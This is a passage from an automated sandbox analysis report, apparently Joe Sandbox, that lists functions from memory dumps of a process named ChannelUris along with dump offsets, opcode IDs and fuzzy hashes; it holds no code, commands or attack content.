                                                                                                            Function 092B9411 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 29cdd4222a3b2b76ba50a45ff56eb4443c386893b78876dc98b188cc5b40fbd3
                                                                                                            • Instruction ID: 6646b7484b45695d9842dab53891f812e914e2e4604bdd468a4c4dc2fd1988a2
                                                                                                            • Opcode Fuzzy Hash: 29cdd4222a3b2b76ba50a45ff56eb4443c386893b78876dc98b188cc5b40fbd3
                                                                                                            • Instruction Fuzzy Hash: F6F01574E09208EFDB84CFA8DA40AACBBF0EB49308F14C0AAD808D7711C7359A45CF01
                                                                                                            Function 04B17FA8 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3655123d158bc443ad0655877df2f526c320963a5cfaf4db9f949448c0a7cee
                                                                                                            • Instruction ID: 704b0cfa20f0ef70645a6a5db0c9344d3d9ea104b6931904053c0b6c2eceb245
                                                                                                            • Opcode Fuzzy Hash: a3655123d158bc443ad0655877df2f526c320963a5cfaf4db9f949448c0a7cee
                                                                                                            • Instruction Fuzzy Hash: A0E0C232B004D55B8B10852CAC49CA7B7C9C7492687BCC6F1F828CB360FE10FC024390
                                                                                                            Function 04B17895 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 42e646088c01a607ab452412041d17abd47eb51f95365b2fa7b91be12026f2ff
                                                                                                            • Instruction ID: 9931fe44311020eaca5890fd0c47493e74b9d0ea810ffead938477ac5b2c4dd5
                                                                                                            • Opcode Fuzzy Hash: 42e646088c01a607ab452412041d17abd47eb51f95365b2fa7b91be12026f2ff
                                                                                                            • Instruction Fuzzy Hash: 8DF01C70B0020BCFEB04DBA4C595B6F7BA2AB44344F108958D6029F365DB79A949CBD0
                                                                                                            Function 093A9567 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8efbc268ed498c7b3f66f4357ac25efba5a987803eee6cd91847dc646ecf9d45
                                                                                                            • Instruction ID: ee943a58f243f084a8c1c208c48636623ee76105be9d0f40dbb7583077a745b1
                                                                                                            • Opcode Fuzzy Hash: 8efbc268ed498c7b3f66f4357ac25efba5a987803eee6cd91847dc646ecf9d45
                                                                                                            • Instruction Fuzzy Hash: 6B014D74805268CFDB648FA4D9587D8BBB0FB0A301F0049EBD95DA6650DB742A80CF21
                                                                                                            Function 093A21A2 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ca7659f6b03a6fc88e935f39ddd2bf499385b3cfedf38e684f35a0b354c0a2c2
                                                                                                            • Instruction ID: b2b5f33672be1c85c81e8613c49d3ccda86b305b7fd8fe671f920134347946c5
                                                                                                            • Opcode Fuzzy Hash: ca7659f6b03a6fc88e935f39ddd2bf499385b3cfedf38e684f35a0b354c0a2c2
                                                                                                            • Instruction Fuzzy Hash: BDF06DB891A228CFDB60DF24D8A47D9BAB4FB08309F2050D9D95EA2241DB705FC1CF01
                                                                                                            Function 0983A788 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction ID: 0bbf3feaa8c083b9aa9165cee1017e8b1e1e3185ff0e6466d3a6ae032b3a8375
                                                                                                            • Opcode Fuzzy Hash: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction Fuzzy Hash: CDE0ED74E04208EFCB44DFA8D5816ACFBF5EB48300F10C0AD9849D3341D6359A52DF81
                                                                                                            Function 09836178 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction ID: e0f7ad44c8409b447dcf5f1d1172551c580d385f5b67d9f17f4816a6dff09080
                                                                                                            • Opcode Fuzzy Hash: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction Fuzzy Hash: 85E0ED74E04208EFCB54DFA8D5456ACFBF5EB48314F10C0AE9808D3341D635AA52DF81
                                                                                                            Function 0983DCF0 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction ID: 533cf53acba7b2426223f8a1d49986fd38261fa10d296616b00005c7de976fd2
                                                                                                            • Opcode Fuzzy Hash: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction Fuzzy Hash: 98E0C974E04208EFCB84DFA8D5416ACFBF5EB88300F50C0A9981893341D6359A52DF81
                                                                                                            Function 0983D6F8 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction ID: 2eb1a4010ee46314ef3d622f50714b109d36fe001b1a03dff1723c09f87fccf4
                                                                                                            • Opcode Fuzzy Hash: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction Fuzzy Hash: 92E0C274E04208EFCB84DFA8D941AACFBF5EB48300F10C5AA9809A3381D7359A52DF81
                                                                                                            Function 09822438 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24af3e90aad6c9882f689412ee8232c387f40d8446bef7c56e04132b09ba5f38
                                                                                                            • Instruction ID: ec81ec33a8e9f720092dc31360cbde97b823c25dce7160f554b0008b1b48ae50
                                                                                                            • Opcode Fuzzy Hash: 24af3e90aad6c9882f689412ee8232c387f40d8446bef7c56e04132b09ba5f38
                                                                                                            • Instruction Fuzzy Hash: 25F03AB4A01629CFDB24CF68CA48A9AB7B6FB49306F1000D9D509E7785C7346E858F10
                                                                                                            Function 0983BE50 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction ID: 193ac1f43c8291d80919e722ffa3c46d7776834433146d281d304c792a15a4bc
                                                                                                            • Opcode Fuzzy Hash: 5a7486bcfef443c503b0677f446b1e8cd148df0d57b3b1d851d3772b7f98e068
                                                                                                            • Instruction Fuzzy Hash: 3CE0C2B4E04208EFCB84DFA8D541AADFBF5EB48300F50C0AA9818A3351D635AA52DF81
                                                                                                            Function 092B83C8 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e9fdbbc36c0718c87e60ad4b9662cf83e87a625bba65e0e955ae7558f28a2b2
                                                                                                            • Instruction ID: 7ca6e435f6c9bdf3cf224e092d61d0702f7a2b9f423cfa920b5f3a46fc08f1d2
                                                                                                            • Opcode Fuzzy Hash: 5e9fdbbc36c0718c87e60ad4b9662cf83e87a625bba65e0e955ae7558f28a2b2
                                                                                                            • Instruction Fuzzy Hash: 50E0E574E04208EFCB84DFA9D5816ACFBF8EB48300F10C0A9980897341D6359A02CF51
                                                                                                            Function 092B9420 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e9fdbbc36c0718c87e60ad4b9662cf83e87a625bba65e0e955ae7558f28a2b2
                                                                                                            • Instruction ID: 392e3547725c2aea38af7d28f55020ba2592482f5b14a7bcb3cb57dd268733d1
                                                                                                            • Opcode Fuzzy Hash: 5e9fdbbc36c0718c87e60ad4b9662cf83e87a625bba65e0e955ae7558f28a2b2
                                                                                                            • Instruction Fuzzy Hash: DFE0E574E08208EFCB84DFA8D5416ACFBF4EB48304F10C0A9D81897341D6359A46CF41
                                                                                                            Function 092B8F71 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 32788c905347d317e7cc86896ee780cbc53de8b972763af5e095948586fb32e7
                                                                                                            • Instruction ID: bf4c5d120434e8ecfc2f6185b1397f71678ac0e9bdd8ed90c23a20ff25d26670
                                                                                                            • Opcode Fuzzy Hash: 32788c905347d317e7cc86896ee780cbc53de8b972763af5e095948586fb32e7
                                                                                                            • Instruction Fuzzy Hash: 7BE0D874A08209DFC704CF70C644A68FF71EF45340F24D1DD9A0917242C7718A82DF02
                                                                                                            Function 0983A5B0 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f3caab0aef03d0eab7b72d10372e0ed8fbcbb5e98e08cb03470cb08a48380acd
                                                                                                            • Instruction ID: 8866c297cc87735623218012105a0ab9b522047d820494f70f12bcd978906ded
                                                                                                            • Opcode Fuzzy Hash: f3caab0aef03d0eab7b72d10372e0ed8fbcbb5e98e08cb03470cb08a48380acd
                                                                                                            • Instruction Fuzzy Hash: 46E0C274E08208EFCB88DFA8D5416ACBBF4AB48204F10C0A99858D3341D6359A02DF81
                                                                                                            Function 0983EF40 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 386caf56ab2e459045818e014ae362317568b8228b95abbfd5e163513290d9fd
                                                                                                            • Instruction ID: f76a93773dd5e7a75f3edb98b6929a4bfdddda087ab85ab8e8efb4690061f0c4
                                                                                                            • Opcode Fuzzy Hash: 386caf56ab2e459045818e014ae362317568b8228b95abbfd5e163513290d9fd
                                                                                                            • Instruction Fuzzy Hash: 4CE04FB1D0920CEBCB54EFF8D6053ADBBF5EB08305F5090AD9808D3341DA745A41DB92
                                                                                                            Function 0983A468 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f3caab0aef03d0eab7b72d10372e0ed8fbcbb5e98e08cb03470cb08a48380acd
                                                                                                            • Instruction ID: ebcb340a0e995dbbf72c80b89c73f50092d7ccb4bcae22f653efbb1c875480f4
                                                                                                            • Opcode Fuzzy Hash: f3caab0aef03d0eab7b72d10372e0ed8fbcbb5e98e08cb03470cb08a48380acd
                                                                                                            • Instruction Fuzzy Hash: 13E0C274E04208EFCB88DFA8D5456ACBBF8EB48204F10C0A9980893341D6369A02CF81
                                                                                                            Function 093ACD28 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7b58decaea79522f7f2511d6a24d4c7664d87c6e4cbe5d1623a7af0b187c4614
                                                                                                            • Instruction ID: c7d589daf5ab8db11cf7150940a99debdc1eb5350b88a4be139787cbb972110b
                                                                                                            • Opcode Fuzzy Hash: 7b58decaea79522f7f2511d6a24d4c7664d87c6e4cbe5d1623a7af0b187c4614
                                                                                                            • Instruction Fuzzy Hash: D0E0E574E04208EFCB84DFA9D545AACFBF8EB48300F10D0A9D808A7311D6349A41CF41
                                                                                                            Function 092B6A70 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8629a3f97768af0ef241240f6e919e26c1f2a34103ecc3b2dec05df2fb6774a3
                                                                                                            • Instruction ID: 7f3493d857bb05451f3e5a85b94a30aee78e8679746873b51640044bc758915d
                                                                                                            • Opcode Fuzzy Hash: 8629a3f97768af0ef241240f6e919e26c1f2a34103ecc3b2dec05df2fb6774a3
                                                                                                            • Instruction Fuzzy Hash: 99E01234918208EFCB44EFA4D944AACBBB5AB09321F10C198E8082B321C631AE51EF91
                                                                                                            Function 092B6500 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 901661631390123ae5a24b7903bd0389fe76b3855449280657669ec0f775fb6e
                                                                                                            • Instruction ID: bcbb5d0c2a852f87e329b819d41dcd5515039168e7b0a07a84486230184083a8
                                                                                                            • Opcode Fuzzy Hash: 901661631390123ae5a24b7903bd0389fe76b3855449280657669ec0f775fb6e
                                                                                                            • Instruction Fuzzy Hash: 6CE012B4E0820CEFCB94EFA8D5042ACBBF5EB48300F10D1A98848A7300D6389A51CF81
                                                                                                            Function 092B8585 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bbffc29ed8041b603c9de75e7568138890c6f01b9047fcc3d0c29d58003dfc6
                                                                                                            • Instruction ID: 48ca32f4c382be1264157df3d1620ae91c65628553f466b8b63a15159f491260
                                                                                                            • Opcode Fuzzy Hash: 6bbffc29ed8041b603c9de75e7568138890c6f01b9047fcc3d0c29d58003dfc6
                                                                                                            • Instruction Fuzzy Hash: F1F0F2B4911209CFDB20CFA8D948B8DBBF6FB09305F14019AD509A7644C3706E85CF01
                                                                                                            Function 04B1EE60 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 82e2e89e4e847454427a11b63d499bfb22107795b9b734fc8a0f6526b915891e
                                                                                                            • Instruction ID: c3f9be85f800ab6bb5ad6db04ffc8695ff5ad6f991a5011bed9397c9d3e75931
                                                                                                            • Opcode Fuzzy Hash: 82e2e89e4e847454427a11b63d499bfb22107795b9b734fc8a0f6526b915891e
                                                                                                            • Instruction Fuzzy Hash: 0AE0EC337041198AFB909965E484726769AD784710FA488B2E90982568D675F9818514
                                                                                                            Function 093ACCD8 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 96be79e57ba98583f0b11b5540817fb113e118549538cb070257e48becaaeba2
                                                                                                            • Instruction ID: b0a7ae50ab303043253a74f221de600460326bb5a6d39925be1c87251eab7460
                                                                                                            • Opcode Fuzzy Hash: 96be79e57ba98583f0b11b5540817fb113e118549538cb070257e48becaaeba2
                                                                                                            • Instruction Fuzzy Hash: A0E075B8E09208EFCB54DFA9D5456ACBBF4EB48300F10D1A9D849A3355D6345A42DF81
                                                                                                            Function 092BE070 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd5c3935a75e11cf7dd40ee7f8b07a56b1990677b90b1b4b3ddd4802a7ab5a39
                                                                                                            • Instruction ID: c8090c8d746df09794a6a9e78ba2d503ca87c8d9d0888992269a10a7dda12599
                                                                                                            • Opcode Fuzzy Hash: fd5c3935a75e11cf7dd40ee7f8b07a56b1990677b90b1b4b3ddd4802a7ab5a39
                                                                                                            • Instruction Fuzzy Hash: FFD02B3226530497EA30296448017D133CC6F457D1F514879E6046F2C0C5A1E801C7E1
                                                                                                            Function 092B70CD Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3b962e3675d00d297bbe3d4c562223ab80bbd95936475a7cef35aca4bc5e7ba0
                                                                                                            • Instruction ID: 29e0c1fdfaf9526b8b0ac47261403f7adbfb4d94ea1e8eea5e46d259ccd3198e
                                                                                                            • Opcode Fuzzy Hash: 3b962e3675d00d297bbe3d4c562223ab80bbd95936475a7cef35aca4bc5e7ba0
                                                                                                            • Instruction Fuzzy Hash: DCF015B0A15118CFDB10DF68E5847DEBBB6FB8A301F40499AD586A3B44CB786D81CF52
                                                                                                            Function 092B9B3A Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 552040897814da6fcdb32191006c8696d24064b5eeba3791d6291deadd4db836
                                                                                                            • Instruction ID: dd859186d8ae168bb4896c84315c99e32d9b6f3703223aa3ee2991d69dc0f3a4
                                                                                                            • Opcode Fuzzy Hash: 552040897814da6fcdb32191006c8696d24064b5eeba3791d6291deadd4db836
                                                                                                            • Instruction Fuzzy Hash: 6CE0DFB0A09149AFCB00DFB8E6046ACBFB1DB81200F1006ACC40ADBA06E5745E419BA1
                                                                                                            Function 092B9270 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81cf1ed2d6376926673b6f8c882a8c2630877232a87895f3d4b313309cef0d1d
                                                                                                            • Instruction ID: 734121de0d7c5e839d1ddc9b7d294f21ae3093252e40e8ca4f2a12333502c33e
                                                                                                            • Opcode Fuzzy Hash: 81cf1ed2d6376926673b6f8c882a8c2630877232a87895f3d4b313309cef0d1d
                                                                                                            • Instruction Fuzzy Hash: 34E08678D08208EBC748DF94D5419ACFBB5EF89304F10C199DC0417341C6316E52DF91
                                                                                                            Function 092B7D90 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 833dd4e47cae7a5c384aad3bfe62b0eb8fd6c3359558346427b4431d08daaa73
                                                                                                            • Instruction ID: 4abbe8f433929f4f58c738f12206de6dafef62fa916b04f7516ae56bb410684b
                                                                                                            • Opcode Fuzzy Hash: 833dd4e47cae7a5c384aad3bfe62b0eb8fd6c3359558346427b4431d08daaa73
                                                                                                            • Instruction Fuzzy Hash: 1EE04670A24208EFC784EFA8C9416ACBBF8AB88340F2080A9880897341E7319E42CB41
                                                                                                            Function 092B8F80 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81cf1ed2d6376926673b6f8c882a8c2630877232a87895f3d4b313309cef0d1d
                                                                                                            • Instruction ID: 78481f843c6e820e95a27efa35874d1593a00ddf305585048ae37ff61dc79e4b
                                                                                                            • Opcode Fuzzy Hash: 81cf1ed2d6376926673b6f8c882a8c2630877232a87895f3d4b313309cef0d1d
                                                                                                            • Instruction Fuzzy Hash: 26E08674908208EFC704DF94D5419ACFBB9EB45300F50D099DE0817341C6319E52DF91
                                                                                                            Function 09838C28 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
